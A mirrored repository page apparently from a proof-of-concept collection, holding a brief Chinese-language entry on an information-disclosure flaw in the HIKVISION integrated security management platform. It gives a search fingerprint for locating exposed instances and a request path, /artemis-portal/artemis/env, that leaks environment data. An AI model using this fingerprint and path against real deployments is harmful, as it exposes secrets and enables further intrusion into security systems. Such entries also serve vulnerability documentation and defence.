admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/HIKVISION 综合安防管理平台 env 信息泄漏漏洞.md
Threekiii eeee9feed5 更新漏洞
2023-08-28 16:53:48 +08:00

29 lines
533 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# HIKVISION 综合安防管理平台 env 信息泄漏漏洞
## 漏洞描述
HIKVISION 综合安防管理平台存在信息泄漏漏洞攻击者通过漏洞可以获取环境env等敏感消息进一步攻击
## 漏洞影响
HIKVISION 综合安防管理平台
## 网络测绘
```
app="HIKVISION-综合安防管理平台"
```
## 漏洞复现
登录页面
![image-20220824134144287](./images/202208241341481.png)
验证POC
```
/artemis-portal/artemis/env
```
![image-20230828163057813](images/image-20230828163057813.png)
Reference in New Issue View Git Blame Copy Permalink